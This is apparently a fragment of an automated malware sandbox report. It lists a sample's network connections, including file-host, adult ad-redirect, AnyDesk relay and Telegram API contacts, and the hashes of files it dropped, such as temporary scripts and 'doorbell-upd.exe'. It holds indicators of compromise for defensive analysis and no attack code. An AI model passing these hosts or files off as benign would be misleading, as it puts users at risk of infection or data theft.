| US | 8.8.8.8:53 | store4.gofile.io | udp |
| US | 8.8.8.8:53 | gofile.io | udp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 8.8.8.8:53 | 245.70.14.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dl-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | dl-edge.smartscreen.microsoft.com | udp |
| GB | 51.140.242.104:443 | dl-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | 104.242.140.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | app-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | app-edge.smartscreen.microsoft.com | udp |
| NL | 23.62.61.194:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-mobile-static.azureedge.net | tcp |
| GB | 216.58.204.67:443 | update.googleapis.com | tcp |
| US | 8.8.8.8:53 | 64.246.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 114.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| US | 8.8.8.8:53 | ctt.ac | udp |
| US | 8.8.8.8:53 | ctt.ac | udp |
| US | 134.209.68.5:443 | ctt.ac | tcp |
| US | 8.8.8.8:53 | ctt.ac | udp |
| US | 134.209.68.5:443 | ctt.ac | tcp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | clicktotweet.com | udp |
| US | 8.8.8.8:53 | clicktotweet.com | udp |
| US | 8.8.8.8:53 | clicktotweet.com | udp |
| SE | 184.31.15.35:443 | bzib.nelreports.net | tcp |
| US | 134.209.68.5:443 | clicktotweet.com | tcp |
| US | 8.8.8.8:53 | 56.104.245.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.68.209.134.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| GB | 51.140.242.104:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 51.140.242.104:443 | nav-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 134.209.68.5:443 | clicktotweet.com | tcp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| BE | 74.125.71.156:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 8.8.8.8:53 | clicktotweet.com | udp |
| US | 104.244.42.193:443 | twitter.com | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 8.8.8.8:53 | clicktotweet.com | udp |
| US | 104.244.42.193:443 | twitter.com | tcp |
| US | 8.8.8.8:53 | x.com | udp |
| US | 8.8.8.8:53 | x.com | udp |
| US | 8.8.8.8:53 | x.com | udp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.71.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.42.244.104.in-addr.arpa | udp |
| US | 104.244.42.129:443 | x.com | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 8.8.8.8:53 | x.com | udp |
| US | 8.8.8.8:53 | abs.twimg.com | udp |
| US | 8.8.8.8:53 | abs.twimg.com | udp |
| US | 8.8.8.8:53 | t.co | udp |
| US | 8.8.8.8:53 | t.co | udp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 8.8.8.8:53 | pbs.twimg.com | udp |
| US | 8.8.8.8:53 | pbs.twimg.com | udp |
| PL | 93.184.221.165:443 | t.co | tcp |
| US | 8.8.8.8:53 | api.x.com | udp |
| US | 8.8.8.8:53 | api.x.com | udp |
| US | 151.101.188.159:443 | pbs.twimg.com | tcp |
| US | 8.8.8.8:53 | api.twitter.com | udp |
| US | 8.8.8.8:53 | api.twitter.com | udp |
| US | 104.244.42.66:443 | api.twitter.com | tcp |
| US | 104.244.42.2:443 | api.twitter.com | tcp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 8.8.8.8:53 | 129.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.21.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | x.com | udp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 8.8.8.8:53 | video.twimg.com | udp |
| US | 8.8.8.8:53 | video.twimg.com | udp |
| US | 151.101.188.158:443 | video.twimg.com | tcp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 8.8.8.8:53 | abs-0.twimg.com | udp |
| US | 8.8.8.8:53 | abs-0.twimg.com | udp |
| US | 104.244.43.131:443 | abs-0.twimg.com | tcp |
| US | 8.8.8.8:53 | 159.188.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.188.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.43.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 104.244.42.66:443 | api.twitter.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 84.27.250.142.in-addr.arpa | udp |
| NL | 142.250.27.84:443 | accounts.google.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 104.19.130.98:443 | spankbang.com | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | assets.sb-cd.com | udp |
| US | 8.8.8.8:53 | assets.sb-cd.com | udp |
| US | 8.8.8.8:53 | tb.sb-cd.com | udp |
| US | 8.8.8.8:53 | tb.sb-cd.com | udp |
| US | 8.8.8.8:53 | 98.130.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hls-uranus.sb-cd.com | udp |
| US | 8.8.8.8:53 | hls-uranus.sb-cd.com | udp |
| US | 104.16.5.5:443 | hls-uranus.sb-cd.com | udp |
| US | 104.16.4.5:443 | hls-uranus.sb-cd.com | udp |
| US | 104.16.4.5:443 | hls-uranus.sb-cd.com | udp |
| US | 104.16.4.5:443 | hls-uranus.sb-cd.com | udp |
| US | 8.8.8.8:53 | c.ptgncdn.com | udp |
| US | 8.8.8.8:53 | c.ptgncdn.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | udp |
| GB | 89.187.167.3:443 | c.ptgncdn.com | tcp |
| GB | 89.187.167.3:443 | c.ptgncdn.com | tcp |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 104.16.5.5:443 | hls-uranus.sb-cd.com | udp |
| US | 104.16.5.5:443 | hls-uranus.sb-cd.com | tcp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | 5.5.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.4.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.33.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.167.187.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nullhole124065.spankbang.com | udp |
| US | 8.8.8.8:53 | nullhole124065.spankbang.com | udp |
| US | 104.19.131.98:443 | nullhole124065.spankbang.com | udp |
| US | 8.8.8.8:53 | creative.xlviirdr.com | udp |
| US | 8.8.8.8:53 | creative.xlviirdr.com | udp |
| US | 104.18.40.50:443 | creative.xlviirdr.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 104.19.131.98:443 | spankbang.com | udp |
| US | 8.8.8.8:53 | 73.80.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.131.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.40.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | impactserving.com | udp |
| US | 8.8.8.8:53 | impactserving.com | udp |
| US | 8.8.8.8:53 | impactserving.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 104.18.176.151:443 | impactserving.com | udp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| US | 8.8.8.8:53 | engine-cm.hqscene.com | udp |
| US | 8.8.8.8:53 | engine-cm.hqscene.com | udp |
| US | 8.8.8.8:53 | engine-cm.hqscene.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| GB | 195.181.164.19:443 | a.magsrv.com | tcp |
| NL | 213.227.142.29:443 | engine-cm.hqscene.com | tcp |
| US | 8.8.8.8:53 | stats.postgen.com | udp |
| US | 8.8.8.8:53 | stats.postgen.com | udp |
| US | 74.117.182.34:443 | stats.postgen.com | tcp |
| US | 74.117.182.34:443 | stats.postgen.com | tcp |
| US | 8.8.8.8:53 | 178.36.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.176.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.164.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.142.227.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | go.xlviirdr.com | udp |
| US | 8.8.8.8:53 | go.xlviirdr.com | udp |
| US | 8.8.8.8:53 | cdn.banhq.com | udp |
| US | 8.8.8.8:53 | cdn.banhq.com | udp |
| US | 8.8.8.8:53 | cdn.banhq.com | udp |
| US | 8.8.8.8:53 | engine-cm.hqscene.com | udp |
| US | 104.18.40.50:443 | go.xlviirdr.com | udp |
| US | 104.18.40.50:443 | go.xlviirdr.com | udp |
| US | 8.8.8.8:53 | 34.182.117.74.in-addr.arpa | udp |
| FI | 18.165.122.78:443 | cdn.banhq.com | tcp |
| US | 104.18.40.50:443 | go.xlviirdr.com | tcp |
| US | 104.18.40.50:443 | go.xlviirdr.com | tcp |
| US | 8.8.8.8:53 | cdn-cm.hqscene.com | udp |
| US | 8.8.8.8:53 | cdn-cm.hqscene.com | udp |
| US | 8.8.8.8:53 | video.ktkjmp.com | udp |
| US | 8.8.8.8:53 | video.ktkjmp.com | udp |
| US | 104.18.48.21:443 | video.ktkjmp.com | udp |
| US | 8.8.8.8:53 | 78.122.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | go.mnaspm.com | udp |
| US | 8.8.8.8:53 | go.mnaspm.com | udp |
| US | 8.8.8.8:53 | go.mnaspm.com | udp |
| US | 8.8.8.8:53 | impactserving.com | udp |
| US | 8.8.8.8:53 | 21.48.18.104.in-addr.arpa | udp |
| US | 104.18.40.50:443 | go.mnaspm.com | udp |
| US | 104.18.40.50:443 | go.mnaspm.com | udp |
| US | 8.8.8.8:53 | xlivesex.com | udp |
| US | 8.8.8.8:53 | xlivesex.com | udp |
| US | 104.18.40.50:443 | go.mnaspm.com | tcp |
| US | 104.17.111.106:443 | xlivesex.com | udp |
| US | 8.8.8.8:53 | creative.mnaspm.com | udp |
| US | 8.8.8.8:53 | creative.mnaspm.com | udp |
| US | 8.8.8.8:53 | creative.mnaspm.com | udp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 104.17.10.106:443 | img.strpst.com | udp |
| US | 8.8.8.8:53 | s.magsrv.com | udp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | 106.111.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.10.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.229.211.95.in-addr.arpa | udp |
| US | 104.17.10.106:443 | img.strpst.com | tcp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| US | 104.19.130.98:443 | spankbang.com | udp |
| US | 104.19.130.98:443 | spankbang.com | tcp |
| US | 8.8.8.8:53 | img.stripcdn.com | udp |
| US | 8.8.8.8:53 | img.stripcdn.com | udp |
| US | 8.8.8.8:53 | st.stripcdn.com | udp |
| US | 8.8.8.8:53 | st.stripcdn.com | udp |
| US | 8.8.8.8:53 | st.stripcdn.com | udp |
| US | 8.8.8.8:53 | img.stripcdn.com | udp |
| US | 8.8.8.8:53 | st.stripcdn.com | udp |
| US | 8.8.8.8:53 | st.stripcdn.com | udp |
| US | 8.8.8.8:53 | img.stripcdn.com | udp |
| US | 8.8.8.8:53 | img.stripcdn.com | udp |
| US | 8.8.8.8:53 | s3t3d2y8.afcdn.net | udp |
| US | 8.8.8.8:53 | s3t3d2y8.afcdn.net | udp |
| GB | 195.181.164.16:443 | s3t3d2y8.afcdn.net | tcp |
| US | 8.8.8.8:53 | edge-hls.sacdnssedge.com | udp |
| US | 8.8.8.8:53 | edge-hls.sacdnssedge.com | udp |
| GB | 195.181.164.12:443 | edge-hls.sacdnssedge.com | tcp |
| US | 104.18.48.21:443 | video.ktkjmp.com | udp |
| US | 104.18.40.50:443 | creative.mnaspm.com | udp |
| US | 8.8.8.8:53 | video.ktkjmp.com | udp |
| US | 8.8.8.8:53 | video.ktkjmp.com | udp |
| US | 8.8.8.8:53 | static.hotjar.com | udp |
| US | 8.8.8.8:53 | static.hotjar.com | udp |
| US | 104.18.53.225:443 | video.ktkjmp.com | udp |
| US | 3.164.68.34:443 | static.hotjar.com | tcp |
| US | 8.8.8.8:53 | b-hls-14.sacdnssedge.com | udp |
| US | 8.8.8.8:53 | b-hls-14.sacdnssedge.com | udp |
| US | 8.8.8.8:53 | vstream-48.sb-cd.com | udp |
| GB | 195.181.164.12:443 | b-hls-14.sacdnssedge.com | tcp |
| NL | 185.76.10.17:443 | vstream-48.sb-cd.com | tcp |
| US | 8.8.8.8:53 | 16.164.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.164.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.53.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.68.164.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.10.76.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | script.hotjar.com | udp |
| US | 8.8.8.8:53 | script.hotjar.com | udp |
| FI | 108.156.22.67:443 | script.hotjar.com | tcp |
| US | 8.8.8.8:53 | go.xxxviijmp.com | udp |
| US | 8.8.8.8:53 | go.xxxviijmp.com | udp |
| US | 172.64.147.206:443 | go.xxxviijmp.com | udp |
| US | 172.64.147.206:443 | go.xxxviijmp.com | tcp |
| US | 8.8.8.8:53 | 67.22.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.147.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | boot.net.anydesk.com | udp |
| NL | 23.62.61.97:443 | www.bing.com | udp |
| FR | 141.95.145.210:443 | boot.net.anydesk.com | tcp |
| FR | 141.95.145.210:80 | boot.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | relay-98c428ee.net.anydesk.com | udp |
| GB | 195.181.165.154:443 | relay-98c428ee.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 8.8.8.8:53 | 210.145.95.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.165.181.195.in-addr.arpa | udp |
| US | 104.17.10.106:443 | img.strpst.com | tcp |
| FR | 141.95.145.210:443 | boot.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | relay-aeafd8c0.net.anydesk.com | udp |
| GB | 57.128.141.154:443 | relay-aeafd8c0.net.anydesk.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | 154.141.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.102.255.239.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.189.173.21:443 | nw-umwatson.events.data.microsoft.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | 21.173.189.20.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:19262 | udp | |
| N/A | 239.255.102.18:30752 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:17786 | udp | |
| N/A | 239.255.102.18:31752 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:18782 | udp | |
| N/A | 239.255.102.18:32461 | udp | |
| US | 8.8.8.8:53 | api.playanext.com | udp |
| FI | 18.165.140.57:80 | api.playanext.com | tcp |
| NL | 23.62.61.155:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | abs.twimg.com | udp |
| US | 8.8.8.8:53 | abs.twimg.com | udp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 5e49b7a6a5cddfd5321edf73fa2c69c9 |
| SHA1 | 315ce9aea21aa8cad377043737afe7aa1d483950 |
| SHA256 | 97233d908007e9fbcbb703f9976e161f3fab4bd08649102f3ee89e0c5a009c5a |
| SHA512 | c18242d09d32b81ec0ee14c49443ee52e7f579bea1ab5b0a0988458f28aaf704db4aeada309b0b55f34ceaac3c9c6d83f5ec310410ea0d3ffebe16babd6c12e1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 4181bbcff8f721bccd5e89bfeea6bebc |
| SHA1 | e7e807c3353de4cfa9eede8d6813483fb9853070 |
| SHA256 | 7b227b171b42985679e29a1d41d7700728931371709655dd0af34f7eb528e742 |
| SHA512 | 77687b798f34c72e6d76fde54c6547135d2b5082cbeab79f18d9304ea316988043312035d934e906628a6bf8f4db5900b3b818013fe05dc148a7cfb31e484233 |
\??\pipe\crashpad_1824_VPHAMVUQWFTOVYDX
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Temp\F75B.tmp\F75C.tmp\F75D.vbs
| MD5 | d9c7f4fd88a8a0d08f8181c4bfd21b72 |
| SHA1 | 2c72ed965a31bd8b39013b12099b244df58fa8e1 |
| SHA256 | 65537c23d5789c2f574f961f5d34a04391ffffa4ba92a9b448f1946e7ede4a6f |
| SHA512 | f9c23cfb1550be89d1c47109491738e5471b1ed514fde58581f6769ebfd03b97ab32999d8cdb2977e60f1b166c47b2d41cbacbc78718312c638246b5ad04b78b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e42fe8accbf2b9d2ac3da3847a92cd46 |
| SHA1 | e1815d744f5d64933d3cd3f4d623a641b14f72d2 |
| SHA256 | 301f71970c5067db2a8e4aa4218b742e9f59f146459b92385cf6ddcd9b75b0c4 |
| SHA512 | e45eeeee781871d569fe1bcbce62024c90a55a824cfd06304dd75bab83ee123e701289a9dd2197d5470172d8d3884f4120727ed17fddbe00cd59a7e807a9625a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | dcd13a504b29596f37424fbe6223c219 |
| SHA1 | 3062e2068ad2b12ea68e423daad4ed2caef169b7 |
| SHA256 | 4ed6f849784f8189dd3b8805df42f83843ba0d7f71a6bd5a56542682a4a490d9 |
| SHA512 | 28aad049f41a1b915481127b7e56b3bbbf18879b58d8b885f394a85863a4dfdaf32983bce7e11850e541a7e81af44dd10ec8ba53216bb470d4abe399e1c08570 |
C:\Users\Admin\AppData\Roaming\doorbell-upd.exe
| MD5 | 6cb9a46b7423b460cf06b740f69ec00f |
| SHA1 | bbd536cec6e0cc7edc5542122b417e02bafa0ab8 |
| SHA256 | 9d784e524d380cdbab451d5bd02f45ae96c893d3959f8acb5d678d92f5593818 |
| SHA512 | 1dbcfeaca34a17d347da3ce51a6ebffaa78546240d9f1e2a2dda05f8332dde3845d4f51fe49a16d2adbfeaa1fb15ea3873fbcf5c36602dc4eedb14e1f744522f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 3849863e3c696bbe945e13b724c89392 |
| SHA1 | 81d02bcee2a8d403cc5509fd2f7649f3d538fed5 |
| SHA256 | fd95129484415666665c6bdb29e0dff46b0eb1d9d4210ad65fac6fd343a36368 |
| SHA512 | 86e011f1a0f74b30cf00ed3f0b37fbe6ea2079dcda122eb36444dceb2803ddb5a3fae2dc84fe17ab64a4282fc7278839fbc24d2828c9a07ab5f5eca00986f4fd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
| MD5 | 20d4b8fa017a12a108c87f540836e250 |
| SHA1 | 1ac617fac131262b6d3ce1f52f5907e31d5f6f00 |
| SHA256 | 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d |
| SHA512 | 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856 |
C:\Users\Admin\AppData\Local\Temp\2D5.tmp\2D6.tmp\2D7.bat
| MD5 | 01a143a4c96cd68edc098eec28b92605 |
| SHA1 | 28d4fb883af2cfcf2fc2690cb548c163fff98732 |
| SHA256 | 8864c3567c339c798f6a46a6dd17ae8f19a1fbac8f523838e926edc6251d79e5 |
| SHA512 | 9ca26669e31d25fd8b1302c9e5bb72e78612fe6158b5c497f8d69895bce81478f06d104d725b3de1767573209d7837d33ce489262c04380e3bda706cae3b4886 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hm3dxesq.1z0.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2600-115-0x000001A0E5940000-0x000001A0E5962000-memory.dmp
C:\Users\Admin\Downloads\AnyDesk.exe
| MD5 | aee6801792d67607f228be8cec8291f9 |
| SHA1 | bf6ba727ff14ca2fddf619f292d56db9d9088066 |
| SHA256 | 1cdafbe519f60aaadb4a92e266fff709129f86f0c9ee595c45499c66092e0499 |
| SHA512 | 09d9fc8702ab6fa4fc9323c37bc970b8a7dd180293b0dbf337de726476b0b9515a4f383fa294ba084eccf0698d1e3cb5a39d0ff9ea3ba40c8a56acafce3add4f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | be17296ee1dda0751baa390813ce8bf5 |
| SHA1 | a9cc661d23482e79063ad92ae11250dedf720541 |
| SHA256 | 80b380e9d45368f89fbf97f929fe2704f7efe19f23ce65414921a55c5e7d9322 |
| SHA512 | 7fe5866511adce862d2e69bd1cee1f0b54053b652380fe31fd1bd064ab35c969b691717beca9b105743f9b5db21c68f0c5180ddf4407079f8d0ea54f41614e32 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache
| MD5 | b6f7a6b03164d4bf8e3531a5cf721d30 |
| SHA1 | a2134120d4712c7c629cdceef9de6d6e48ca13fa |
| SHA256 | 3d6f3f8f1456d7ce78dd9dfa8187318b38e731a658e513f561ee178766e74d39 |
| SHA512 | 4b473f45a5d45d420483ea1d9e93047794884f26781bbfe5370a554d260e80ad462e7eeb74d16025774935c3a80cbb2fd1293941ee3d7b64045b791b365f2b63 |
C:\Users\Admin\AppData\Roaming\enc1.mp3
| MD5 | bbb44733d6b0bd75d6a26a9a4427705f |
| SHA1 | c29d6ec521f30efb23331648a4a7a234b2db3894 |
| SHA256 | 33b5c07a614eadb209b95b48454a10b1251809f8cc896577de5e117144b58507 |
